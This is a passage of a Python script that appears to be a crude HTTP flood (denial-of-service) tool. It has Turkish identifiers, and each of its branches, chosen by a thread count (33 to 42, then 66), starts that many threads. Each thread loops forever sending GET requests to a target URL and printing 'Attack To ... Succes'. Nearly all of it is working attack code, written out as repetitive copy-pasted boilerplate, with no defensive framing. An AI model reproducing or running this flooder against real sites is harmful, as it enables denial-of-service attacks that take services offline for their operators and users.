    t22 = Thread(target=islem32)
    t22.start()
    t23 = Thread(target=islem32)
    t23.start()
    t24 = Thread(target=islem32)
    t24.start()
    t25 = Thread(target=islem32)
    t25.start()
    t26 = Thread(target=islem32)
    t26.start()
    t27 = Thread(target=islem32)
    t27.start()
    t28 = Thread(target=islem32)
    t28.start()
    t29 = Thread(target=islem32)
    t29.start()
    t30 = Thread(target=islem32)
    t30.start()
    t31 = Thread(target=islem32)
    t31.start()
    t32 = Thread(target=islem32)
    t32.start()

elif thread == "33":

    def islem33():
        while True:

            bomb = requests.get(url)
            sonuc = bomb.status_code
            writing = "Attack To {} Succes - {}".format(url,sonuc)
            print(writing)

    t1 = Thread(target=islem33)
    t1.start()
    t2 = Thread(target=islem33)
    t2.start()
    t3 = Thread(target=islem33)
    t3.start()
    t4 = Thread(target=islem33)
    t4.start()
    t5 = Thread(target=islem33)
    t5.start()
    t6 = Thread(target=islem33)
    t6.start()
    t7 = Thread(target=islem33)
    t7.start()
    t8 = Thread(target=islem33)
    t8.start()
    t9 = Thread(target=islem33)
    t9.start()
    t10 = Thread(target=islem33)
    t10.start()
    t11 = Thread(target=islem33)
    t11.start()
    t12 = Thread(target=islem33)
    t12.start()
    t13 = Thread(target=islem33)
    t13.start()
    t14 = Thread(target=islem33)
    t14.start()
    t15 = Thread(target=islem33)
    t15.start()
    t16 = Thread(target=islem33)
    t16.start()
    t17 = Thread(target=islem33)
    t17.start()
    t18 = Thread(target=islem33)
    t18.start()
    t19 = Thread(target=islem33)
    t19.start()
    t20 = Thread(target=islem33)
    t20.start()
    t21 = Thread(target=islem33)
    t21.start()
    t22 = Thread(target=islem33)
    t22.start()
    t23 = Thread(target=islem33)
    t23.start()
    t24 = Thread(target=islem33)
    t24.start()
    t25 = Thread(target=islem33)
    t25.start()
    t26 = Thread(target=islem33)
    t26.start()
    t27 = Thread(target=islem33)
    t27.start()
    t28 = Thread(target=islem33)
    t28.start()
    t29 = Thread(target=islem33)
    t29.start()
    t30 = Thread(target=islem33)
    t30.start()
    t31 = Thread(target=islem33)
    t31.start()
    t32 = Thread(target=islem33)
    t32.start()
    t33 = Thread(target=islem33)
    t33.start()

elif thread == "34":

    def islem34():
        while True:

            bomb = requests.get(url)
            sonuc = bomb.status_code
            writing = "Attack To {} Succes - {}".format(url,sonuc)
            print(writing)

    t1 = Thread(target=islem34)
    t1.start()
    t2 = Thread(target=islem34)
    t2.start()
    t3 = Thread(target=islem34)
    t3.start()
    t4 = Thread(target=islem34)
    t4.start()
    t5 = Thread(target=islem34)
    t5.start()
    t6 = Thread(target=islem34)
    t6.start()
    t7 = Thread(target=islem34)
    t7.start()
    t8 = Thread(target=islem34)
    t8.start()
    t9 = Thread(target=islem34)
    t9.start()
    t10 = Thread(target=islem34)
    t10.start()
    t11 = Thread(target=islem34)
    t11.start()
    t12 = Thread(target=islem34)
    t12.start()
    t13 = Thread(target=islem34)
    t13.start()
    t14 = Thread(target=islem34)
    t14.start()
    t15 = Thread(target=islem34)
    t15.start()
    t16 = Thread(target=islem34)
    t16.start()
    t17 = Thread(target=islem34)
    t17.start()
    t18 = Thread(target=islem34)
    t18.start()
    t19 = Thread(target=islem34)
    t19.start()
    t20 = Thread(target=islem34)
    t20.start()
    t21 = Thread(target=islem34)
    t21.start()
    t22 = Thread(target=islem34)
    t22.start()
    t23 = Thread(target=islem34)
    t23.start()
    t24 = Thread(target=islem34)
    t24.start()
    t25 = Thread(target=islem34)
    t25.start()
    t26 = Thread(target=islem34)
    t26.start()
    t27 = Thread(target=islem34)
    t27.start()
    t28 = Thread(target=islem34)
    t28.start()
    t29 = Thread(target=islem34)
    t29.start()
    t30 = Thread(target=islem34)
    t30.start()
    t31 = Thread(target=islem34)
    t31.start()
    t32 = Thread(target=islem34)
    t32.start()
    t33 = Thread(target=islem34)
    t33.start()
    t34 = Thread(target=islem34)
    t34.start()

elif thread == "35":

    def islem35():
        while True:

            bomb = requests.get(url)
            sonuc = bomb.status_code
            writing = "Attack To {} Succes - {}".format(url,sonuc)
            print(writing)

    t1 = Thread(target=islem35)
    t1.start()
    t2 = Thread(target=islem35)
    t2.start()
    t3 = Thread(target=islem35)
    t3.start()
    t4 = Thread(target=islem35)
    t4.start()
    t5 = Thread(target=islem35)
    t5.start()
    t6 = Thread(target=islem35)
    t6.start()
    t7 = Thread(target=islem35)
    t7.start()
    t8 = Thread(target=islem35)
    t8.start()
    t9 = Thread(target=islem35)
    t9.start()
    t10 = Thread(target=islem35)
    t10.start()
    t11 = Thread(target=islem35)
    t11.start()
    t12 = Thread(target=islem35)
    t12.start()
    t13 = Thread(target=islem35)
    t13.start()
    t14 = Thread(target=islem35)
    t14.start()
    t15 = Thread(target=islem35)
    t15.start()
    t16 = Thread(target=islem35)
    t16.start()
    t17 = Thread(target=islem35)
    t17.start()
    t18 = Thread(target=islem35)
    t18.start()
    t19 = Thread(target=islem35)
    t19.start()
    t20 = Thread(target=islem35)
    t20.start()
    t21 = Thread(target=islem35)
    t21.start()
    t22 = Thread(target=islem35)
    t22.start()
    t23 = Thread(target=islem35)
    t23.start()
    t24 = Thread(target=islem35)
    t24.start()
    t25 = Thread(target=islem35)
    t25.start()
    t26 = Thread(target=islem35)
    t26.start()
    t27 = Thread(target=islem35)
    t27.start()
    t28 = Thread(target=islem35)
    t28.start()
    t29 = Thread(target=islem35)
    t29.start()
    t30 = Thread(target=islem35)
    t30.start()
    t31 = Thread(target=islem35)
    t31.start()
    t32 = Thread(target=islem35)
    t32.start()
    t33 = Thread(target=islem35)
    t33.start()
    t34 = Thread(target=islem35)
    t34.start()
    t35 = Thread(target=islem35)
    t35.start()

elif thread == "36":

    def islem36():
        while True:

            bomb = requests.get(url)
            sonuc = bomb.status_code
            writing = "Attack To {} Succes - {}".format(url,sonuc)
            print(writing)

    t1 = Thread(target=islem36)
    t1.start()
    t2 = Thread(target=islem36)
    t2.start()
    t3 = Thread(target=islem36)
    t3.start()
    t4 = Thread(target=islem36)
    t4.start()
    t5 = Thread(target=islem36)
    t5.start()
    t6 = Thread(target=islem36)
    t6.start()
    t7 = Thread(target=islem36)
    t7.start()
    t8 = Thread(target=islem36)
    t8.start()
    t9 = Thread(target=islem36)
    t9.start()
    t10 = Thread(target=islem36)
    t10.start()
    t11 = Thread(target=islem36)
    t11.start()
    t12 = Thread(target=islem36)
    t12.start()
    t13 = Thread(target=islem36)
    t13.start()
    t14 = Thread(target=islem36)
    t14.start()
    t15 = Thread(target=islem36)
    t15.start()
    t16 = Thread(target=islem36)
    t16.start()
    t17 = Thread(target=islem36)
    t17.start()
    t18 = Thread(target=islem36)
    t18.start()
    t19 = Thread(target=islem36)
    t19.start()
    t20 = Thread(target=islem36)
    t20.start()
    t21 = Thread(target=islem36)
    t21.start()
    t22 = Thread(target=islem36)
    t22.start()
    t23 = Thread(target=islem36)
    t23.start()
    t24 = Thread(target=islem36)
    t24.start()
    t25 = Thread(target=islem36)
    t25.start()
    t26 = Thread(target=islem36)
    t26.start()
    t27 = Thread(target=islem36)
    t27.start()
    t28 = Thread(target=islem36)
    t28.start()
    t29 = Thread(target=islem36)
    t29.start()
    t30 = Thread(target=islem36)
    t30.start()
    t31 = Thread(target=islem36)
    t31.start()
    t32 = Thread(target=islem36)
    t32.start()
    t33 = Thread(target=islem36)
    t33.start()
    t34 = Thread(target=islem36)
    t34.start()
    t35 = Thread(target=islem36)
    t35.start()
    t36 = Thread(target=islem36)
    t36.start()

elif thread == "37":

    def islem37():
        while True:

            bomb = requests.get(url)
            sonuc = bomb.status_code
            writing = "Attack To {} Succes - {}".format(url,sonuc)
            print(writing)

    t1 = Thread(target=islem37)
    t1.start()
    t2 = Thread(target=islem37)
    t2.start()
    t3 = Thread(target=islem37)
    t3.start()
    t4 = Thread(target=islem37)
    t4.start()
    t5 = Thread(target=islem37)
    t5.start()
    t6 = Thread(target=islem37)
    t6.start()
    t7 = Thread(target=islem37)
    t7.start()
    t8 = Thread(target=islem37)
    t8.start()
    t9 = Thread(target=islem37)
    t9.start()
    t10 = Thread(target=islem37)
    t10.start()
    t11 = Thread(target=islem37)
    t11.start()
    t12 = Thread(target=islem37)
    t12.start()
    t13 = Thread(target=islem37)
    t13.start()
    t14 = Thread(target=islem37)
    t14.start()
    t15 = Thread(target=islem37)
    t15.start()
    t16 = Thread(target=islem37)
    t16.start()
    t17 = Thread(target=islem37)
    t17.start()
    t18 = Thread(target=islem37)
    t18.start()
    t19 = Thread(target=islem37)
    t19.start()
    t20 = Thread(target=islem37)
    t20.start()
    t21 = Thread(target=islem37)
    t21.start()
    t22 = Thread(target=islem37)
    t22.start()
    t23 = Thread(target=islem37)
    t23.start()
    t24 = Thread(target=islem37)
    t24.start()
    t25 = Thread(target=islem37)
    t25.start()
    t26 = Thread(target=islem37)
    t26.start()
    t27 = Thread(target=islem37)
    t27.start()
    t28 = Thread(target=islem37)
    t28.start()
    t29 = Thread(target=islem37)
    t29.start()
    t30 = Thread(target=islem37)
    t30.start()
    t31 = Thread(target=islem37)
    t31.start()
    t32 = Thread(target=islem37)
    t32.start()
    t33 = Thread(target=islem37)
    t33.start()
    t34 = Thread(target=islem37)
    t34.start()
    t35 = Thread(target=islem37)
    t35.start()
    t36 = Thread(target=islem37)
    t36.start()
    t37 = Thread(target=islem37)
    t37.start()

elif thread == "38":

    def islem38():
        while True:

            bomb = requests.get(url)
            sonuc = bomb.status_code
            writing = "Attack To {} Succes - {}".format(url,sonuc)
            print(writing)

    t1 = Thread(target=islem38)
    t1.start()
    t2 = Thread(target=islem38)
    t2.start()
    t3 = Thread(target=islem38)
    t3.start()
    t4 = Thread(target=islem38)
    t4.start()
    t5 = Thread(target=islem38)
    t5.start()
    t6 = Thread(target=islem38)
    t6.start()
    t7 = Thread(target=islem38)
    t7.start()
    t8 = Thread(target=islem38)
    t8.start()
    t9 = Thread(target=islem38)
    t9.start()
    t10 = Thread(target=islem38)
    t10.start()
    t11 = Thread(target=islem38)
    t11.start()
    t12 = Thread(target=islem38)
    t12.start()
    t13 = Thread(target=islem38)
    t13.start()
    t14 = Thread(target=islem38)
    t14.start()
    t15 = Thread(target=islem38)
    t15.start()
    t16 = Thread(target=islem38)
    t16.start()
    t17 = Thread(target=islem38)
    t17.start()
    t18 = Thread(target=islem38)
    t18.start()
    t19 = Thread(target=islem38)
    t19.start()
    t20 = Thread(target=islem38)
    t20.start()
    t21 = Thread(target=islem38)
    t21.start()
    t22 = Thread(target=islem38)
    t22.start()
    t23 = Thread(target=islem38)
    t23.start()
    t24 = Thread(target=islem38)
    t24.start()
    t25 = Thread(target=islem38)
    t25.start()
    t26 = Thread(target=islem38)
    t26.start()
    t27 = Thread(target=islem38)
    t27.start()
    t28 = Thread(target=islem38)
    t28.start()
    t29 = Thread(target=islem38)
    t29.start()
    t30 = Thread(target=islem38)
    t30.start()
    t31 = Thread(target=islem38)
    t31.start()
    t32 = Thread(target=islem38)
    t32.start()
    t33 = Thread(target=islem38)
    t33.start()
    t34 = Thread(target=islem38)
    t34.start()
    t35 = Thread(target=islem38)
    t35.start()
    t36 = Thread(target=islem38)
    t36.start()
    t37 = Thread(target=islem38)
    t37.start()
    t38 = Thread(target=islem38)
    t38.start()

elif thread == "39":

    def islem39():
        while True:

            bomb = requests.get(url)
            sonuc = bomb.status_code
            writing = "Attack To {} Succes - {}".format(url,sonuc)
            print(writing)

    t1 = Thread(target=islem39)
    t1.start()
    t2 = Thread(target=islem39)
    t2.start()
    t3 = Thread(target=islem39)
    t3.start()
    t4 = Thread(target=islem39)
    t4.start()
    t5 = Thread(target=islem39)
    t5.start()
    t6 = Thread(target=islem39)
    t6.start()
    t7 = Thread(target=islem39)
    t7.start()
    t8 = Thread(target=islem39)
    t8.start()
    t9 = Thread(target=islem39)
    t9.start()
    t10 = Thread(target=islem39)
    t10.start()
    t11 = Thread(target=islem39)
    t11.start()
    t12 = Thread(target=islem39)
    t12.start()
    t13 = Thread(target=islem39)
    t13.start()
    t14 = Thread(target=islem39)
    t14.start()
    t15 = Thread(target=islem39)
    t15.start()
    t16 = Thread(target=islem39)
    t16.start()
    t17 = Thread(target=islem39)
    t17.start()
    t18 = Thread(target=islem39)
    t18.start()
    t19 = Thread(target=islem39)
    t19.start()
    t20 = Thread(target=islem39)
    t20.start()
    t21 = Thread(target=islem39)
    t21.start()
    t22 = Thread(target=islem39)
    t22.start()
    t23 = Thread(target=islem39)
    t23.start()
    t24 = Thread(target=islem39)
    t24.start()
    t25 = Thread(target=islem39)
    t25.start()
    t26 = Thread(target=islem39)
    t26.start()
    t27 = Thread(target=islem39)
    t27.start()
    t28 = Thread(target=islem39)
    t28.start()
    t29 = Thread(target=islem39)
    t29.start()
    t30 = Thread(target=islem39)
    t30.start()
    t31 = Thread(target=islem39)
    t31.start()
    t32 = Thread(target=islem39)
    t32.start()
    t33 = Thread(target=islem39)
    t33.start()
    t34 = Thread(target=islem39)
    t34.start()
    t35 = Thread(target=islem39)
    t35.start()
    t36 = Thread(target=islem39)
    t36.start()
    t37 = Thread(target=islem39)
    t37.start()
    t38 = Thread(target=islem39)
    t38.start()
    t39 = Thread(target=islem39)
    t39.start()

elif thread == "40":

    def islem40():
        while True:

            bomb = requests.get(url)
            sonuc = bomb.status_code
            writing = "Attack To {} Succes - {}".format(url,sonuc)
            print(writing)

    t1 = Thread(target=islem40)
    t1.start()
    t2 = Thread(target=islem40)
    t2.start()
    t3 = Thread(target=islem40)
    t3.start()
    t4 = Thread(target=islem40)
    t4.start()
    t5 = Thread(target=islem40)
    t5.start()
    t6 = Thread(target=islem40)
    t6.start()
    t7 = Thread(target=islem40)
    t7.start()
    t8 = Thread(target=islem40)
    t8.start()
    t9 = Thread(target=islem40)
    t9.start()
    t10 = Thread(target=islem40)
    t10.start()
    t11 = Thread(target=islem40)
    t11.start()
    t12 = Thread(target=islem40)
    t12.start()
    t13 = Thread(target=islem40)
    t13.start()
    t14 = Thread(target=islem40)
    t14.start()
    t15 = Thread(target=islem40)
    t15.start()
    t16 = Thread(target=islem40)
    t16.start()
    t17 = Thread(target=islem40)
    t17.start()
    t18 = Thread(target=islem40)
    t18.start()
    t19 = Thread(target=islem40)
    t19.start()
    t20 = Thread(target=islem40)
    t20.start()
    t21 = Thread(target=islem40)
    t21.start()
    t22 = Thread(target=islem40)
    t22.start()
    t23 = Thread(target=islem40)
    t23.start()
    t24 = Thread(target=islem40)
    t24.start()
    t25 = Thread(target=islem40)
    t25.start()
    t26 = Thread(target=islem40)
    t26.start()
    t27 = Thread(target=islem40)
    t27.start()
    t28 = Thread(target=islem40)
    t28.start()
    t29 = Thread(target=islem40)
    t29.start()
    t30 = Thread(target=islem40)
    t30.start()
    t31 = Thread(target=islem40)
    t31.start()
    t32 = Thread(target=islem40)
    t32.start()
    t33 = Thread(target=islem40)
    t33.start()
    t34 = Thread(target=islem40)
    t34.start()
    t35 = Thread(target=islem40)
    t35.start()
    t36 = Thread(target=islem40)
    t36.start()
    t37 = Thread(target=islem40)
    t37.start()
    t38 = Thread(target=islem40)
    t38.start()
    t39 = Thread(target=islem40)
    t39.start()
    t40 = Thread(target=islem40)
    t40.start()

elif thread == "41":

    def islem41():
        while True:

            bomb = requests.get(url)
            sonuc = bomb.status_code
            writing = "Attack To {} Succes - {}".format(url,sonuc)
            print(writing)

    t1 = Thread(target=islem41)
    t1.start()
    t2 = Thread(target=islem41)
    t2.start()
    t3 = Thread(target=islem41)
    t3.start()
    t4 = Thread(target=islem41)
    t4.start()
    t5 = Thread(target=islem41)
    t5.start()
    t6 = Thread(target=islem41)
    t6.start()
    t7 = Thread(target=islem41)
    t7.start()
    t8 = Thread(target=islem41)
    t8.start()
    t9 = Thread(target=islem41)
    t9.start()
    t10 = Thread(target=islem41)
    t10.start()
    t11 = Thread(target=islem41)
    t11.start()
    t12 = Thread(target=islem41)
    t12.start()
    t13 = Thread(target=islem41)
    t13.start()
    t14 = Thread(target=islem41)
    t14.start()
    t15 = Thread(target=islem41)
    t15.start()
    t16 = Thread(target=islem41)
    t16.start()
    t17 = Thread(target=islem41)
    t17.start()
    t18 = Thread(target=islem41)
    t18.start()
    t19 = Thread(target=islem41)
    t19.start()
    t20 = Thread(target=islem41)
    t20.start()
    t21 = Thread(target=islem41)
    t21.start()
    t22 = Thread(target=islem41)
    t22.start()
    t23 = Thread(target=islem41)
    t23.start()
    t24 = Thread(target=islem41)
    t24.start()
    t25 = Thread(target=islem41)
    t25.start()
    t26 = Thread(target=islem41)
    t26.start()
    t27 = Thread(target=islem41)
    t27.start()
    t28 = Thread(target=islem41)
    t28.start()
    t29 = Thread(target=islem41)
    t29.start()
    t30 = Thread(target=islem41)
    t30.start()
    t31 = Thread(target=islem41)
    t31.start()
    t32 = Thread(target=islem41)
    t32.start()
    t33 = Thread(target=islem41)
    t33.start()
    t34 = Thread(target=islem41)
    t34.start()
    t35 = Thread(target=islem41)
    t35.start()
    t36 = Thread(target=islem41)
    t36.start()
    t37 = Thread(target=islem41)
    t37.start()
    t38 = Thread(target=islem41)
    t38.start()
    t39 = Thread(target=islem41)
    t39.start()
    t40 = Thread(target=islem41)
    t40.start()
    t41 = Thread(target=islem41)
    t41.start()

elif thread == "42":

    def islem42():
        while True:

            bomb = requests.get(url)
            sonuc = bomb.status_code
            writing = "Attack To {} Succes - {}".format(url,sonuc)
            print(writing)

    t1 = Thread(target=islem42)
    t1.start()
    t2 = Thread(target=islem42)
    t2.start()
    t3 = Thread(target=islem42)
    t3.start()
    t4 = Thread(target=islem42)
    t4.start()
    t5 = Thread(target=islem42)
    t5.start()
    t6 = Thread(target=islem42)
    t6.start()
    t7 = Thread(target=islem42)
    t7.start()
    t8 = Thread(target=islem42)
    t8.start()
    t9 = Thread(target=islem42)
    t9.start()
    t10 = Thread(target=islem42)
    t10.start()
    t11 = Thread(target=islem42)
    t11.start()
    t12 = Thread(target=islem42)
    t12.start()
    t13 = Thread(target=islem42)
    t13.start()
    t14 = Thread(target=islem42)
    t14.start()
    t15 = Thread(target=islem42)
    t15.start()
    t16 = Thread(target=islem42)
    t16.start()
    t17 = Thread(target=islem42)
    t17.start()
    t18 = Thread(target=islem42)
    t18.start()
    t19 = Thread(target=islem42)
    t19.start()
    t20 = Thread(target=islem42)
    t20.start()
    t21 = Thread(target=islem42)
    t21.start()
    t22 = Thread(target=islem42)
    t22.start()
    t23 = Thread(target=islem42)
    t23.start()
    t24 = Thread(target=islem42)
    t24.start()
    t25 = Thread(target=islem42)
    t25.start()
    t26 = Thread(target=islem42)
    t26.start()
    t27 = Thread(target=islem42)
    t27.start()
    t28 = Thread(target=islem42)
    t28.start()
    t29 = Thread(target=islem42)
    t29.start()
    t30 = Thread(target=islem42)
    t30.start()
    t31 = Thread(target=islem42)
    t31.start()
    t32 = Thread(target=islem42)
    t32.start()
    t33 = Thread(target=islem42)
    t33.start()
    t34 = Thread(target=islem42)
    t34.start()
    t35 = Thread(target=islem42)
    t35.start()
    t36 = Thread(target=islem42)
    t36.start()
    t37 = Thread(target=islem42)
    t37.start()
    t38 = Thread(target=islem42)
    t38.start()
    t39 = Thread(target=islem42)
    t39.start()
    t40 = Thread(target=islem42)
    t40.start()
    t41 = Thread(target=islem42)
    t41.start()
    t42 = Thread(target=islem42)
    t42.start()

elif thread == "66":

    def islem66():
        while True:

            bomb = requests.get(url)
            sonuc = bomb.status_code
            writing = "Attack To {} Succes - {}".format(url,sonuc)
            print(writing)

    t1 = Thread(target=islem66)
    t1.start()
    t2 = Thread(target=islem66)
    t2.start()
    t3 = Thread(target=islem66)
    t3.start()
    t4 = Thread(target=islem66)
    t4.start()
    t5 = Thread(target=islem66)
    t5.start()
    t6 = Thread(target=islem66)
    t6.start()
    t7 = Thread(target=islem66)
    t7.start()
    t8 = Thread(target=islem66)
    t8.start()
    t9 = Thread(target=islem66)
    t9.start()
    t10 = Thread(target=islem66)
    t10.start()
    t11 = Thread(target=islem66)
    t11.start()
    t12 = Thread(target=islem66)
    t12.start()
    t13 = Thread(target=islem66)
    t13.start()
    t14 = Thread(target=islem66)
    t14.start()
    t15 = Thread(target=islem66)
    t15.start()
    t16 = Thread(target=islem66)
    t16.start()
    t17 = Thread(target=islem66)
    t17.start()
    t18 = Thread(target=islem66)
    t18.start()
    t19 = Thread(target=islem66)
    t19.start()
    t20 = Thread(target=islem66)
    t20.start()
    t21 = Thread(target=islem66)
    t21.start()
    t22 = Thread(target=islem66)
    t22.start()
    t23 = Thread(target=islem66)
    t23.start()
    t24 = Thread(target=islem66)
    t24.start()
    t25 = Thread(target=islem66)
    t25.start()
    t26 = Thread(target=islem66)
    t26.start()
    t27 = Thread(target=islem66)
    t27.start()
    t28 = Thread(target=islem66)
    t28.start()
    t29 = Thread(target=islem66)
    t29.start()
    t30 = Thread(target=islem66)
    t30.start()
    t31 = Thread(target=islem66)
    t31.start()
    t32 = Thread(target=islem66)
    t32.start()
    t33 = Thread(target=islem66)
    t33.start()
    t34 = Thread(target=islem66)
    t34.start()
    t35 = Thread(target=islem66)
    t35.start()
    t36 = Thread(target=islem66)
    t36.start()
    t37 = Thread(target=islem66)
    t37.start()
    t38 = Thread(target=islem66)
    t38.start()
    t39 = Thread(target=islem66)
    t39.start()
    t40 = Thread(target=islem66)
    t40.start()
    t41 = Thread(target=islem66)
    t41.start()
    t42 = Thread(target=islem66)
    t42.start()
    t43 = Thread(target=islem66)
    t43.start()
    t44 = Thread(target=islem66)
    t44.start()
    t45 = Thread(target=islem66)
    t45.start()
    t46 = Thread(target=islem66)
    t46.start()
    t47 = Thread(target=islem66)
    t47.start()
    t48 = Thread(target=islem66)
    t48.start()
    t49 = Thread(target=islem66)
    t49.start()
    t50 = Thread(target=islem66)
    t50.start()
    t51 = Thread(target=islem66)
    t51.start()
    t52 = Thread(target=islem66)
    t52.start()
    t53 = Thread(target=islem66)
    t53.start()
    t54 = Thread(target=islem66)
    t54.start()
    t55 = Thread(target=islem66)
    t55.start()
    t56 = Thread(target=islem66)
    t56.start()
    t57 = Thread(target=islem66)
    t57.start()
    t58 = Thread(target=islem66)
    t58.start()
    t59 = Thread(target=islem66)
    t59.start()
    t60 = Thread(target=islem66)
    t60.start()
    t61 = Thread(target=islem66)
    t61.start()
    t62 = Thread(target=islem66)
    t62.start()
    t63 = Thread(target=islem66)
    t63.start()
    t64 = Thread(target=islem66)
    t64.start()
    t65 = Thread(target=islem66)
    t65.start()
    t66 = Thread(target=islem66)
    t66.start()
